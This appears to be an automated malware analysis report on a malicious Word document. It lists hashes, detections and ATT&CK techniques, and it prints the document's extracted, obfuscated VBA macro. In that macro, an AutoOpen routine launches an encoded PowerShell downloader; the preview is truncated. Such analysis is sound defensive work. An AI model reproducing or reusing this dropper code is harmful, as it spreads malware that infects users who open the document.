Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 58e73fbb2fc052d5…

MALICIOUS

Office (OLE)

100.2 KB Created: 2018-06-07 19:00:00 Authoring application: Microsoft Office Word First seen: 2019-03-18
MD5: 0a2d18361a75b4a4f570ff81ceca56c9 SHA-1: d99ca07267d73def9b54e50e2f2bb09b30ce78f8 SHA-256: 58e73fbb2fc052d540205651b976a1fe122038838d090ba21c6552fe133a3af6
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The Autoopen macro triggers the execution of a Shell command, which in turn invokes PowerShell. The PowerShell command is obfuscated but appears to be designed to download and execute a second-stage payload. The ClamAV detection and multiple VBA heuristics further support its malicious nature.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6576939-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6576939-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11154 bytes
SHA-256: 95f49c63799f2037546fefcf9a661783d9f8f07de1c013089822e8084fb15b28
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "LtKlPkqfFiI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function iiRcij()
On Error Resume Next
GWjHMz = Tan(BCzBz _
* Tan(RpiAqM * Int(FcBztK * Sqr(64831) / HwAsn + Fix(76299)) / 75959 * Round(63821 / Log(99204 - MYnYbh) + 15255 - EXkjGS)) _
/ 96448 + Log(86918))
iUjNBR = Tan(uDwILD _
* Tan(HiWinF * Int(AUsHGK * Sqr(58541) / riuuu + Fix(17516)) / 23541 * Round(36807 / Log(29491 - GuiXi) + 99740 - AucEj)) _
/ 77876 + Log(19754))
iiRcij = hjLLpJ + Shell(maKSBsKQ + Chr(XRhdJtHHHSc + vbKeyP + ZioGSLw) + AXkMLDIHDqs + hftlIFj + SJWTAN + wTSWNpT + VpiwVGXOVWL, 74714 - 74714)
NdAoFv = Tan(PWMQN _
* Tan(JUvLH * Int(hLCdm * Sqr(84910) / GPBTHt + Fix(70275)) / 14339 * Round(63399 / Log(60540 - iJPwi) + 15359 - SmIqZ)) _
/ 63834 + Log(86237))
End Function
Sub Autoopen()
On Error Resume Next
VcbKAN = Tan(XprNDE _
* Tan(cJcoj * Int(wDijuR * Sqr(38862) / ZPqUa + Fix(60668)) / 46772 * Round(14910 / Log(61894 - iwila) + 12703 - EHvJw)) _
/ 26760 + Log(70608))
iiRcij
LdRtuQ = Tan(tqwZBt _
* Tan(YwUdGK * Int(wMdcPp * Sqr(19543) / vbBFW + Fix(27974)) / 3027 * Round(12674 / Log(26692 - FvErnA) + 9344 - bizoU)) _
/ 13887 + Log(51206))
End Sub



Attribute VB_Name = "NRoRibZU"
Function AXkMLDIHDqs()
On Error Resume Next
XtrvwE = Tan(iQjYc _
* Tan(pziqb * Int(DajpU * Sqr(45441) / PVQVM + Fix(3032)) / 73831 * Round(79260 / Log(52949 - YbbAG) + 6422 - WLYPjD)) _
/ 37635 + Log(58143))
fLmpdZzVFZk = "owersHeLL" + " -e LgAgAC" + "gAIAAkAFM" + "ASA" + "BFAGwAbABpAEQ" + "AWwAx" + "AF0AKwAkAH" + "MASABlAEwA" + "TABJAGQAWwA" + "xADMAXQArACcAWA"
mLYoEW = Tan(qpjSv _
* Tan(XqTNo * Int(OzMzW * Sqr(87877) / JwriS + Fix(94301)) / 83477 * Round(66697 / Log(29696 - QnGBEk) + 21842 - luAni)) _
/ 91443 + Log(36286))
GIfhDNBtji = "An" + "ACk" + "AKAAgA" + "E4A" + "RQBXAC0A" + "Tw" + "BiAGoAR" + "QBDAHQAIAAgA" + "Gk" + "AbwAu"
NPiZO = Tan(ulNYz _
* Tan(OUDnH * Int(DahFK * Sqr(28900) / XlzSV + Fix(31358)) / 92977 * Round(30505 / Log(5448 - bEqLOs) + 39700 - flELQq)) _
/ 23940 + Log(61215))
SAuVmsArIB = "AEMATwBNAHAAUg" + "BFA" + "HMAcwBpA" + "E8AbgAuAEQAZQBG" + "AE"
sshIF = Tan(YrQvT _
* Tan(ICqLlb * Int(REoiNR * Sqr(58978) / wLVIGp + Fix(95204)) / 7839 * Round(45320 / Log(41477 - WoRTww) + 2798 - XiNzfO)) _
/ 55445 + Log(26804))
BCfnbKA = "wAYQB0A" + "GUA" + "cwBUAFIAZQBB" + "AE0AKABbA" + "EkAbwAuAG0A" + "ZQBNAE8AUg"
DKTqa = Tan(bjunNC _
* Tan(wTqKF * Int(zkqlLV * Sqr(14168) / iMqtdb + Fix(67305)) / 1022 * Round(26048 / Log(3165 - wCqnDJ) + 77502 - MkuJUJ)) _
/ 65161 + Log(26846))
MqtGsmbIj = "B5AFMA" + "dABSAEUAYQBNA" + "F0AIABbAGMATwB" + "OAHYAZQ" + "BSAHQAXQA" + "6ADoARgB"
NYIUTr = Tan(TEujab _
* Tan(FoZIsJ * Int(mcXcuK * Sqr(77470) / VjvNF + Fix(75671)) / 79128 * Round(87707 / Log(29764 - KzTwPE) + 36490 - moUvAp)) _
/ 8638 + Log(62624))
UKEzAGzzG = "yAG8ATQB" + "CAGEAc" + "wBlADYAN" + "ABTAFQAcgBJAG" + "4ARwAoACAAJwBW" + "AFoAQ"
wksYhE = Tan(jKoMW _
* Tan(QvKfh * Int(dnNTJ * Sqr(19964) / ziZiF + Fix(18034)) / 47353 * Round(25039 / Log(86691 - WEdtC) + 30427 - PGNbY)) _
/ 49214 + Log(71844))
MzNwCzIWV = "gBiAFQAOABKAEE" + "ARQB" + "JAFgALwB5A" + "GoANAAwAGEAU" + "gB0AG" + "gAQwB3AEkA"
AXkMLDIHDqs = fLmpdZzVFZk + GIfhDNBtji + SAuVmsArIB + BCfnbKA + MqtGsmbIj + UKEzAGzzG + MzNwCzIWV
End Function
Function hftlIFj()
On Error Resume Next
IsCmi = Tan(iNJEi _
* Tan(ciDwz * Int(lnaER * Sqr(51952) / IDDww + Fix(52269)) / 16999 * Round(77976 / Log(25884 - QVaKro) + 82797 - oUGcj)) _
/ 6303 + Log(30384))
UhVjiJuVzc = "RwBhAFU" + "AegBRAHEAZwBtAG" + "cAUgByAG4" + "ANQB" + "ZAG0ASw" + "AyADIANgBG" + "AFgAZAB" + "wAHY"
AnwuDb = Tan(OaNfRM _
* Tan(ZUOkmc * Int(Ntzjk * Sqr(55758) / RfWzj + Fix(36301)) / 50798 * Round(40580 / Log(81287 - tptMj) + 58103 - ZGLul)) _
/ 27194 + Log(92258))
tsYfFh = "AZABnAFYA" + "SQ" + "BJAC8AOQ" + "AxA" + "HkAVABYAHkAWgB" + "aAE" + "8AWQA3AEoAegBOA" + "G4A
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.